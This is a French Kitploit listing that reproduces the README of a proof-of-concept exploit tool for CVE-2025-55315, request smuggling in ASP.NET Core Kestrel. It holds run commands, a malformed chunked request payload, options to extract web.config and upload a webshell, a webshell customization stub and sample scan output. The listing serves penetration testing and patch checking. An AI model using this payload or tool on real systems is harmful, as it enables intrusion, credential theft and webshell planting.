Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55315-PoC-Exploit — Exploit PoC CVE-2025-55315 | Kitploit
Outils/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
Scanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

Exploit PoC CVE-2025-55315

Voir le dépôt
853il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55315 Outil de Test d'Intrusion

Outil d'Exploitation de Contrebande de Requêtes HTTP pour ASP.NET Core Kestrel

Python Version CVE CVSS License


⚠️ AVERTISSEMENT LÉGAL

CE OUTIL EST UNIQUEMENT DESTINÉ AUX TESTS DE SÉCURITÉ AUTORISÉS !

  • Utilisez UNIQUEMENT sur les systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de tester
  • L'accès non autorisé aux systèmes informatiques est ILLÉGAL
  • Le créateur de l'outil n'est PAS responsable d'une mauvaise utilisation
  • En utilisant cet outil, vous acceptez l'entière responsabilité légale

📋 Aperçu

Outil professionnel de test d'intrusion pour CVE-2025-55315 (vulnérabilité de contrebande de requêtes HTTP dans ASP.NET Core Kestrel). Cet outil est conçu pour l'analyse d'une seule cible avec des capacités d'exploitation complètes.

Qu'est-ce que CVE-2025-55315 ?

Une vulnérabilité critique de contrebande de requêtes HTTP dans le serveur web ASP.NET Core Kestrel (CVSS 9.9/10) qui permet aux attaquants de :

  • Contourner l'authentification
  • Voler des identifiants et des jetons de session
  • Effectuer une falsification de requête côté serveur (SSRF)
  • Empoisonner les caches
  • Télécharger des webshells et obtenir une exécution de code à distance

Versions affectées :

  • .NET Core 3.0 à .NET 9.0.9
  • Corrigé dans : .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+

✨ Fonctionnalités

Capacités principales

  • ✅ Analyse sur cible unique - Tests d'intrusion ciblés sur une cible spécifique
  • ✅ Découverte automatique des points de terminaison - Découvre les points de terminaison courants d'ASP.NET Core
  • ✅ Test manuel de points de terminaison - Teste des points de terminaison spécifiques d'intérêt
  • ✅ Détection de vulnérabilité - Détection précise de CVE-2025-55315
  • ✅ Extraction de web.config - Lit les fichiers de configuration via la contrebande de requêtes
  • ✅ Téléchargement de webshell - Capacité optionnelle de déploiement de webshell
  • ✅ Rapports détaillés - Rapports au format JSON et texte
  • ✅ Fonctionnalités de sécurité - Plusieurs invites de confirmation pour les actions destructrices

Fonctionnalités techniques

  • Prise en charge de HTTP/1.1 et HTTPS
  • Prise en charge de ports personnalisés
  • Délais d'attente configurables
  • Mode de débogage verbeux
  • Sortie terminal avec codes couleur
  • Contournement de la validation du certificat SSL (pour les tests)

🔧 Installation

Prérequis

root@kitploit:~
# Python 3.7 or higher
python3 --version

# No external dependencies - uses only standard library

Téléchargement

root@kitploit:~
# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# Make executable
chmod +x cve_2025_55315_PoC.py

🚀 Démarrage rapide

Scan de vulnérabilité de base

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com

Cela va :

  1. Recueillir les informations du serveur
  2. Découvrir automatiquement les points de terminaison actifs
  3. Tester chaque point de terminaison pour CVE-2025-55315
  4. Afficher les résultats dans le terminal

Tester un point de terminaison spécifique

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com -e /api/login

Scan complet avec extraction de web.config

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

Avancé : Exploitation complète (autorisée uniquement !)

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 Exemples d'utilisation

Exemple 1 : Vérification rapide

Scénario : Vérifier si le serveur de production est vulnérable

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com

Durée prévue : 30-60 secondes


Exemple 2 : Scan détaillé

Scénario : Scan complet des points de terminaison avec sortie verbeuse

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

Durée prévue : 2-5 minutes


Exemple 3 : Cibler plusieurs points de terminaison

Scénario : Tester des points de terminaison critiques spécifiques

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

Exemple 4 : Cible non SSL

Scénario : Tester un serveur HTTP interne

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 Options de la ligne de commande

root@kitploit:~
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

Required Arguments:
  -t, --target         Nom d'hôte ou URL cible (par exemple, target.com)

Optional Arguments:
  -p, --port           Numéro de port (par défaut : 443 pour SSL, 80 pour non-SSL)
  -e, --endpoint       Point(s) de terminaison spécifique(s) à tester (peut être utilisé plusieurs fois)
  --no-ssl             Désactiver SSL/HTTPS (utiliser HTTP)
  --read-config        Tenter de lire le fichier web.config
  --upload-shell       Tenter de télécharger un webshell (nécessite confirmation)
  -o, --output         Enregistrer le rapport dans un fichier
  -v, --verbose        Activer la sortie verbeuse
  --timeout            Délai d'attente de la socket en secondes (par défaut : 10)
  -h, --help           Afficher le message d'aide

🔍 Comprendre la sortie

Exemple de système vulnérable

root@kitploit:~
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  ✗ /api/login
    Details: Request smuggling successful - multiple responses
  ✗ /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  ✓ web.config_read via /api/login

Interprétation :

  • 🔴 VULNÉRABILITÉ CRITIQUE DÉTECTÉE
  • 🔴 Plusieurs points de terminaison sont vulnérables
  • 🔴 Le fichier de configuration a été extrait avec succès
  • ⚡ URGENT : Mettez à jour vers .NET 8.0.21+ ou 9.0.10+

Exemple de système sécurisé

root@kitploit:~
Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)

✓ No vulnerable endpoints found - target may be patched

Interprétation :

  • ✅ LE SYSTÈME EST SÉCURISÉ
  • ✅ Exécute une version corrigée de Kestrel
  • ✅ Toutes les requêtes malformées ont été rejetées

🛡️ Sécurité et éthique

Liste de vérification d'autorisation

Avant d'exécuter cet outil, assurez-vous :

  • Vous possédez le système cible, OU
  • Vous avez une autorisation écrite pour tester, ET
  • L'équipe de sécurité a été notifiée, ET
  • Vous avez un plan de retour, ET
  • Vous comprenez les implications juridiques

Fonctionnalités de sécurité intégrées

  1. Confirmation en deux étapes - L'outil demande une autorisation avant de démarrer
  2. Confirmation de téléchargement du webshell - Nécessite de taper "YES" en majuscules
  3. Limitation de débit - Délais entre les requêtes lors de la découverte automatique
  4. Protection par délai d'attente - Empêche les connexions bloquées
  5. Journalisation détaillée - Toutes les actions sont journalisées pour la traçabilité

🔬 Détails techniques

Technique d'exploitation

L'outil exploite CVE-2025-55315 en utilisant un encodage de transfert par tronçons malformé :

root@kitploit:~
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← This becomes a separate request
Host: target.com

Pourquoi cela fonctionne :

  1. Le serveur proxy voit \n comme terminateur de ligne → traite comme une seule requête
  2. Kestrel (vulnérable) ignore \n → traite le GET en contrebande comme une requête séparée
  3. La requête en contrebande peut s'exécuter dans le contexte de session d'un autre utilisateur

Logique de détection

Réponse du serveurInterprétationStatut
400 Bad RequestKestrel a rejeté le tronçon malformé✅ Sécurisé (corrigé)
Plusieurs HTTP/1.1Deux réponses distinctes reçues❌ Vulnérable
500 ou 502Erreur interne du serveur⚠️ Probablement vulnérable
200 OK normalRequête acceptée⚠️ Non concluant

🐛 Dépannage

Connexion échouée

root@kitploit:~
[ERROR] Connection failed: [Errno 111] Connection refused

Solutions :

  • Vérifier que la cible est accessible : ping target.com
  • Vérifier que le numéro de port est correct
  • Essayer avec/sans SSL : --no-ssl
  • Vérifier les règles du pare-feu

Erreur de certificat SSL

root@kitploit:~
[ERROR] Connection failed: certificate verify failed

Solution : L'outil désactive déjà la vérification du certificat. Si le problème persiste :

root@kitploit:~
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com

Erreurs de délai d'attente

root@kitploit:~
[WARNING] No response - possible timeout

Solutions :

  • Augmenter le délai d'attente : --timeout 30
  • Vérifier la connectivité réseau
  • La cible peut être lente ou surchargée

Téléchargement bloqué

root@kitploit:~
[WARNING] Upload blocked (forbidden/method not allowed)

Explication :

  • La configuration du serveur bloque les méthodes PUT/POST
  • Le WAF/IPS bloque le téléchargement
  • Les permissions des fichiers empêchent l'écriture

C'est normal - tous les systèmes vulnérables ne permettent pas le téléchargement de fichiers.


📚 Références

Ressources CVE-2025-55315

  1. Avis de sécurité Microsoft : https://github.com/dotnet/aspnetcore/issues/64033

  2. Base de données NVD : https://nvd.nist.gov/vuln/detail/CVE-2025-55315

  3. Recherche de Praetorian (Bug Bounty de 10 000 $) : https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/

  4. Analyse technique d'Andrew Lock : https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/

Contrebande de requêtes HTTP

  1. Recherche PortSwigger : https://portswigger.net/web-security/request-smuggling

  2. OWASP : https://owasp.org/www-community/attacks/HTTP_Request_Smuggling


🔄 Personnalisation

Ajouter des points de terminaison personnalisés

Modifiez COMMON_ENDPOINTS dans le script :

root@kitploit:~
COMMON_ENDPOINTS = [
    '/your/custom/endpoint',
    '/api/myapp/admin',
    # Add your endpoints here
]

Utiliser un webshell personnalisé

Modifiez la méthode upload_webshell() :

root@kitploit:~
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
                   shell_content: str = None):
    if not shell_content:
        shell_content = '''
        <!-- Your custom ASPX webshell here -->
        '''

📝 Signaler des problèmes

Si vous trouvez des bogues ou avez des suggestions :

  1. Exécutez avec le mode verbeux : -v
  2. Enregistrez la sortie complète : -o debug.txt
  3. Incluez :
    • Version de Python
    • Commande utilisée
    • Message d'erreur
    • Comportement attendu vs réel

⚖️ Avis de non-responsabilité juridique

root@kitploit:~
THIS TOOL IS PROVIDED "AS IS" FOR EDUCATIONAL AND AUTHORIZED
SECURITY TESTING PURPOSES ONLY.

THE AUTHOR(S):
❌ Do NOT endorse illegal activities
❌ Are NOT responsible for misuse
❌ Are NOT liable for any damages
❌ Do NOT provide legal advice

BY USING THIS TOOL YOU AGREE:
✅ To use only on authorized systems
✅ To accept full legal responsibility
✅ To comply with all applicable laws
✅ To follow ethical hacking principles

UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL!

🎓 Objectif éducatif

Cet outil a été créé pour :

  • Chercheurs en sécurité
  • Testeurs d'intrusion
  • Chasseurs de bugs
  • Administrateurs système
  • Formation à la sensibilisation à la sécurité
  • Évaluations de sécurité autorisées

PAS pour :

  • Attaques malveillantes
  • Accès non autorisé
  • Reconnaissance concurrentielle
  • Activités illégales

🙏 Remerciements

  • Microsoft Security Response Center - Pour la divulgation et les correctifs CVE
  • Praetorian Security - Pour la recherche originale sur la vulnérabilité
  • Andrew Lock - Pour l'analyse technique détaillée
  • Communauté de la sécurité - Pour les pratiques de divulgation responsables

📄 Licence

Tests de sécurité éducatifs et autorisés uniquement

Cet outil est fourni à des fins éducatives et de tests de sécurité autorisés. Toute utilisation commerciale, redistribution ou utilisation à des fins malveillantes est strictement interdite.


🔐 Avertissement final

root@kitploit:~
╔═════════════════════════════════════════════════════════════╗
║                                                             ║
║  USE THIS TOOL RESPONSIBLY AND LEGALLY!                     ║
║                                                             ║
║  Unauthorized access to computer systems is a CRIME.        ║
║  Always obtain written permission before testing.           ║
║  Follow responsible disclosure practices.                   ║
║                                                             ║
║  Happy (Legal) Hacking!                                     ║
║                                                             ║
╚═════════════════════════════════════════════════════════════╝
Télécharger l’outil